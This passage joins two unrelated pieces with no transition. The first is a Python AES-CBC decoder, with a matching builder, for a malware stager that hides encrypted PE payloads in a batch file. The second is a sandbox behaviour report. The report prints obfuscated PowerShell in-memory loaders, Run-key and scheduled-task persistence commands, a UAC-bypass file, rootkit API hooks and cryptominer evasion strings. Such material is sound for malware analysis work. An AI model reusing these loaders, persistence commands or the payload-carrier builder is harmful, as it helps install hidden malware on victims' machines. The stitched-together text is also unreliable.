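            ^ _mul(m[2], s[4 * c + (r + 2) % 4]) ^ _mul(m[3], s[4 * c + (r + 3) % 4])
            for c in range(4) for r in range(4)]
def _encrypt_block(rk, s):
    s = _xor(s, rk[0])
    for i in range(1, 15):
        s = _shift_rows([SBOX[b] for b in s])
        s = _xor(_mix_columns(s) if i < 14 else s, rk[i])
    return s
def _decrypt_block(rk, s):
    s = _xor(s, rk[14])
    for i in range(13, -1, -1):
        s = _xor([INV_SBOX[b] for b in _shift_rows(s, inv=True)], rk[i])
        if i:
            s = _mix_columns(s, inv=True)
    return s

def aes_cbc(data, key, iv, decrypt):
    """Raw CBC over whole 16-byte blocks; padding is the caller's job."""
    rk, prev, out = _expand(key), list(iv), bytearray()
    for i in range(0, len(data), 16):
        blk = list(data[i:i + 16])
        if decrypt:
            out += bytes(_xor(_decrypt_block(rk, blk), prev))
            prev = blk
        else:
            prev = _encrypt_block(rk, _xor(blk, prev))
            out += bytes(prev)
    return bytes(out)

# ---- the stager's pipeline (its elgju + VIxdo functions), minus the load step ----
def decode_part(b64):
    padded = aes_cbc(base64.b64decode(b64), KEY, IV, decrypt=True)
    n = padded[-1] if padded else 0
    if not 1 <= n <= 16 or padded[-n:] != bytes([n]) * n:
        raise ValueError("bad PKCS7 padding: wrong key/IV or corrupt blob")
    return gzip.decompress(padded[:-n])

def extract_payloads(bat_text):
    """The first line starting with ':: ' carries the blobs, separated by backslashes."""
    for line in bat_text.splitlines():
        if line.startswith(":: "):
            return [decode_part(p) for p in line[3:].split("\\")]
    raise ValueError("no ':: ' carrier line in batch file")

def build_carrier(payloads):
    """Inverse pipeline; exists only to construct a test .bat here (constructed data)."""
    parts = []
    for p in payloads:
        z = gzip.compress(p)
        n = 16 - len(z) % 16
        parts.append(base64.b64encode(aes_cbc(z + bytes([n]) * n, KEY, IV, decrypt=False)).decode())
    return "@echo off\r\n:: " + "\\".join(parts) + "\r\necho stager\r\n"

if __name__ == "__main__":
    demo = build_carrier([b"MZ" + bytes(62) + b"PE\0\0" + b"A" * 300, b"second stage"])
    for blob in extract_payloads(demo):
        print("PE (MZ)" if blob[:2] == b"MZ" else f"{len(blob)} bytes, not a PE")
```

Each blob extract_payloads returns should start with MZ and can go straight to a .NET decompiler. A padding error means the key or IV in the captured stager differ from the ones logged here; read the two Base64 strings out of its elgju function and replace KEY and IV.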
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:kveHNQwSSGcg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$mhKVIvEXzPrIho,[Parameter(Position=1)][Type]$QOutAUbbtF)$MsesbhAsMah=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+'f'+[Char](108)+''+'e'+''+'c'+'te'+'d'+'D'+[Char](101)+'le'+'g'+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+'m'+''+[Char](111)+'ry'+[Char](77)+''+[Char](111)+'dul'+'e'+'',$False).DefineType(''+[Char](77)+'y'+[Char](68)+''+'e'+''+'l'+''+'e'+''+'g'+''+[Char](97)+''+'t'+''+'e'+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+'C'+''+'l'+''+[Char](97)+''+'s'+'s'+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+'c'+[Char](44)+''+[Char](83)+''+[Char](101)+'a'+[Char](108)+'e'+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+'C'+[Char](108)+''+[Char](97)+''+[Char](115)+'s,'+[Char](65)+'u'+[Char](116)+'o'+'C'+'la'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$MsesbhAsMah.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+'e'+'c'+'i'+''+[Char](97)+''+[Char](108)+''+[Char](78)+'ame'+[Char](44)+''+[Char](72)+''+'i'+'d'+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+'li'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$mhKVIvEXzPrIho).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');$MsesbhAsMah.DefineMethod(''+[Char](73)+'nv'+'o'+'k'+'e'+'',''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+'i'+'d'+'eB'+'y'+'
S'+'i'+'g'+','+''+[Char](78)+''+'e'+'w'+[Char](83)+''+'l'+''+[Char](111)+''+'t'+''+','+''+'V'+''+'i'+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+'l',$QOutAUbbtF,$mhKVIvEXzPrIho).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'t'+[Char](105)+'m'+[Char](101)+''+','+''+[Char](77)+'ana'+[Char](103)+''+[Char](101)+'d');Write-Output $MsesbhAsMah.CreateType();}$gFfWslPcsIxEF=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+'s'+[Char](116)+'e'+[Char](109)+''+'.'+''+'d'+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+'i'+''+'c'+''+[Char](114)+'o'+[Char](115)+'o'+[Char](102)+''+[Char](116)+''+'.'+''+'W'+'i'+'n'+'32.'+[Char](85)+'n'+[Char](115)+''+[Char](97)+''+'f'+''+[Char](101)+'Na'+[Char](116)+'i'+[Char](118)+''+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+''+'h'+''+[Char](111)+''+[Char](100)+'s');$xRDavNIGnzLLon=$gFfWslPcsIxEF.GetMethod(''+'G'+''+'e'+''+[Char](116)+''+[Char](80)+''+'r'+'o'+[Char](99)+''+'A'+''+[Cha
        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:YrWHxoHyNMxl{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$mJbpaFOyxDMlLp,[Parameter(Position=1)][Type]$mBxcLwMzji)$qsXeIcuzIEU=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'e'+[Char](100)+''+[Char](68)+'e'+[Char](108)+'eg'+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+'M'+'e'+'m'+'o'+[Char](114)+''+'y'+''+[Char](77)+'o'+'d'+''+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+'D'+'e'+''+'l'+'e'+[Char](103)+'a'+[Char](116)+'e'+[Char](84)+''+'y'+''+'p'+'e',''+[Char](67)+''+'l'+'a'+'s'+''+[Char](115)+''+[Char](44)+'P'+[Char](117)+''+'b'+''+'l'+'ic'+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+'le'+'d'+','+[Char](65)+''+'n'+'siC'+'l'+'a'+'s'+''+[Char](115)+''+[Char](44)+''+'A'+'ut'+[Char](111)+''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$qsXeIcuzIEU.DefineConstructor(''+[Char](82)+''+[Char](84)+'Sp'+[Char](101)+''+[Char](99)+''+'i'+'a'+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+'e,H'+'i'+''+'d'+'e'+'B'+''+'y'+'S'+[Char](105)+''+'g'+''+[Char](44)+''+[Char](80)+'ub'+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$mJbpaFOyxDMlLp).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'nt'+'i'+''+'m'+''+'e'+''+[Char](44)+''+'M'+'a'+[Char](110)+''+'a'+''+'g'+''+'e'+''+'d'+'');$qsXeIcuzIEU.DefineMethod('I'+[Char](110)+'v'+'o'+''+[Char](107)+''+'e'+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+'c'+''+','+''+'H'+'i'+'d'+''+'e'+'B'+[Char](121)+''+[Char](83)+'i'+'g'+''+','+''+'N'+''+[Char](101)+''+'w'+'S'+[Char](108)+''+[Char](111)+''+[Char](116)+','+'V'+''+[Char](105)+''+'r'+'t'+[C
har](117)+'a'+[Char](108)+'',$mBxcLwMzji,$mJbpaFOyxDMlLp).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+''+[Char](116)+''+'i'+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+'d'+'');Write-Output $qsXeIcuzIEU.CreateType();}$XabpoaxiZGEGR=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+[Char](114)+''+'o'+''+'s'+'o'+[Char](102)+''+[Char](116)+''+'.'+''+'W'+''+[Char](105)+'n32'+[Char](46)+'Uns'+'a'+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+'v'+''+[Char](101)+'M'+[Char](101)+''+[Char](116)+'h'+[Char](111)+'d'+[Char](115)+'');$ONnlOWkAfaUoGE=$XabpoaxiZGEGR.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+'P'+'r'+[Char](111)+''+[Char](99)+'A'+[Char](100)+''+'d'+''+[Cha
        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:NyGuwfckeOJe{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$kiyDauQzMkkpvQ,[Parameter(Position=1)][Type]$OzRVWwEZvx)$JcZRwmspQGK=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+'f'+[Char](108)+''+[Char](101)+''+'c'+'t'+[Char](101)+''+[Char](100)+''+'D'+'e'+'l'+''+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('In'+[Char](77)+'e'+[Char](109)+''+[Char](111)+'ry'+[Char](77)+''+'o'+''+'d'+'u'+[Char](108)+''+'e'+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+''+[Char](84)+'yp'+'e'+'',''+'C'+''+'l'+''+'a'+''+'s'+'s,P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+'c'+','+''+[Char](83)+''+[Char](101)+''+'a'+'le'+'d'+''+[Char](44)+''+'A'+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+'s'+[Char](44)+''+[Char](65)+'u'+'t'+'o'+[Char](67)+''+'l'+''+'a'+'ss',[MulticastDelegate]);$JcZRwmspQGK.DefineConstructor('RT'+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+'a'+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+'e'+','+'H'+'i'+[Char](100)+'e'+[Char](66)+''+[Char](121)+''+[Char](83)+'ig'+[Char](44)+''+'P'+''+[Char](117)+'b'+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$kiyDauQzMkkpvQ).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+'ime,'+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$JcZRwmspQGK.DefineMethod('I'+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+[Char](99)+','+[Char](72)+''+'i'+''+[Char](100)+''+'e'+'B'+'y'+''+[C
har](83)+''+[Char](105)+''+[Char](103)+','+'N'+''+[Char](101)+'w'+[Char](83)+''+'l'+''+[Char](111)+''+[Char](116)+''+','+'V'+[Char](105)+'rt'+[Char](117)+''+[Char](97)+''+[Char](108)+'',$OzRVWwEZvx,$kiyDauQzMkkpvQ).SetImplementationFlags('R'+'u'+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+'a'+'ge'+'d'+'');Write-Output $JcZRwmspQGK.CreateType();}$fMzQsfZpmgSNo=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+''+[Char](116)+'em'+'.'+''+[Char](100)+'ll')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+'r'+''+[Char](111)+''+[Char](115)+''+'o'+''+'f'+''+[Char](116)+'.'+[Char](87)+'in'+[Char](51)+''+[Char](50)+''+[Char](46)+''+'U'+'ns'+'a'+''+'f'+''+'e'+''+[Char](78)+''+'a'+'t'+[Char](105)+''+'v'+'eM'+[Char](101)+''+[Char](116)+''+'h'+'o'+[Char](100)+''+[Char](115)+'');$kCZXEMoRMGVaoJ=$fMzQsfZpmgSNo.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+[
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
        Source: C:\Windows\System32\cmd.exe Code function: 18_3_0000025EE91CA7DD push rcx; retf 003Fh 18_3_0000025EE91CA7DE
        Source: C:\Windows\System32\conhost.exe Code function: 19_3_000001AD31CAA7DD push rcx; retf 003Fh 19_3_000001AD31CAA7DE
        Source: C:\Windows\System32\conhost.exe Code function: 20_2_00000113DB11F99C pushfd ; ret 20_2_00000113DB11F99D
        Source: C:\Windows\System32\conhost.exe Code function: 20_2_00007FF7C14D1C7A push ebx; ret 20_2_00007FF7C14D1CEA
        Source: C:\Windows\System32\conhost.exe Code function: 30_2_0000021E7B55F99C pushfd ; ret 30_2_0000021E7B55F99D
        Source: C:\Windows\System32\conhost.exe Code function: 36_3_00000236C6DDA7DD push rcx; retf 003Fh 36_3_00000236C6DDA7DE
        Source: C:\Windows\System32\cmd.exe Code function: 44_3_0000015829E8A7DD push rcx; retf 003Fh 44_3_0000015829E8A7DE
        Source: C:\Windows\System32\conhost.exe Code function: 45_3_000001D643A7A7DD push rcx; retf 003Fh 45_3_000001D643A7A7DE
        Source: C:\Windows\System32\conhost.exe Code function: 58_3_000002063183A7DD push rcx; retf 003Fh 58_3_000002063183A7DE
        Source: C:\Windows\System32\conhost.exe Code function: 69_3_000001CCE365A7DD push rcx; retf 003Fh 69_3_000001CCE365A7DE
        Source: C:\Windows\System32\conhost.exe Code function: 70_3_000001858EA2A7DD push rcx; retf 003Fh 70_3_000001858EA2A7DE
        Source: C:\Windows\System32\conhost.exe Code function: 73_3_000002942EBFA7DD push rcx; retf 003Fh 73_3_000002942EBFA7DE
        Source: C:\Windows\System32\conhost.exe Code function: 83_3_000001C8A039A7DD push rcx; retf 003Fh 83_3_000001C8A039A7DE
        Source: C:\Windows\System32\conhost.exe Code function: 87_3_000001E5EF04A7DD push rcx; retf 003Fh 87_3_000001E5EF04A7DE
        Source: C:\Windows\System32\dllhost.exe Code function: 96_3_000002ADD624A7DD push rcx; retf 003Fh 96_3_000002ADD624A7DE
        Source: C:\Windows\System32\conhost.exe Code function: 99_3_0000021C0EE6A7DD push rcx; retf 003Fh 99_3_0000021C0EE6A7DE
        Source: C:\Windows\System32\winlogon.exe Code function: 101_3_000001FC6039A7DD push rcx; retf 003Fh 101_3_000001FC6039A7DE
        Source: C:\Windows\System32\lsass.exe Code function: 103_3_00000161C735A7DD push rcx; retf 003Fh 103_3_00000161C735A7DE

        Persistence and Installation Behavior

        Source: C:\Windows\System32\conhost.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys
        Source: C:\Windows\System32\conhost.exe File created: C:\Users\user\AppData\Local\Temp\services64.exe
        Source: C:\Windows\System32\conhost.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe
        Source: C:\Users\user\Desktop\e7WMhx18XN.exe File created: C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exe
        Source: C:\Users\user\Desktop\e7WMhx18XN.exe File created: C:\Users\user\AppData\Local\Temp\paint.exe

        Boot Survival

        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe"

        Hooking and other Techniques for Hiding and Protection

        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe:Zone.Identifier read attributes | delete
        Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
        Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
        Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
        Source: explorer.exe User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE $rbx-stager
        Source: C:\Users\user\Desktop\e7WMhx18XN.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        Source: C:\Windows\System32\dllhost.exe Code function: OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,94_2_0000000140001868
        Source: C:\Windows\System32\dllhost.exe Code function: OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,95_2_0000000140001868
        Source: C:\Windows\System32\dllhost.exe Code function: OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,97_2_0000000140001868
        Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
        Source: C:\Windows\System32\svchost.exe System information queried: FirmwareTableInformation
        Source: C:\Windows\explorer.exe System information queried: FirmwareTableInformation
        Source: conhost.exe, 0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1503362780.0000012BFEB14000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1516296200.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1491167267.0000012BFEB12000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1504370851.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1485004069.0000012BFEB18000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1493388447.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1515362432.0000012BFEB10000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1500353828.0000012BFEB1F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1489451873.0000012BFEB13000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1507696835.0000012BFEB1D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [0M%S STOPPING IDLE, SETTING MAX CPU TO: %D%S STARTING IDLE, SETTING MAX CPU TO: %DTASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE%S
        Source: conhost.exe, 0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1503362780.0000012BFEB14000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1516296200.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1491167267.0000012BFEB12000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1504370851.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1485004069.0000012BFEB18000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1493388447.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1515362432.0000012BFEB10000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1500353828.0000012BFEB1F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1489451873.0000012BFEB13000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1507696835.0000012BFEB1D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
        Source: C:\Users\user\Desktop\e7WMhx18XN.exe Memory allocated: 1140000 memory reserve | memory write watch
        Source: C:\Users\user\Desktop\e7WMhx18XN.exe Memory allocated: 1B260000 memory reserve | memory write watch
        Source: C:\Users\user\Desktop\e7WMhx18XN.exe Thread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\conhost.exe Thread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\dllhost.exe Thread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6336
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3481
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2757
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7107
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2089
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8131
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1347
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8472
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 469
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8845
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 561
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8877
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 498
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8547
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1003
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5442
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6183
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1570
        Source: C:\Windows\System32\conhost.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys
        Source: C:\Windows\System32\dllhost.exe Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess graph_94-618
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess graph_56-246
        Source: C:\Windows\System32\dllhost.exe Evasive API call chain: RegQueryValue,DecisionNodes,ExitProcess graph_94-625
        Source: C:\Windows\System32\dllhost.exe Check user administrative privileges: GetTokenInformation,DecisionNodes graph_94-560
        Source: C:\Users\user\Desktop\e7WMhx18XN.exe TID: 7836 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\explorer.exe TID: 5808 Thread sleep count: 144 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7064 Thread sleep count: 6336 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7064 Thread sleep count: 3481 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3408 Thread sleep time: -6456360425798339s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3952 Thread sleep count: 2757 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2712 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3964 Thread sleep count: 175 > 30
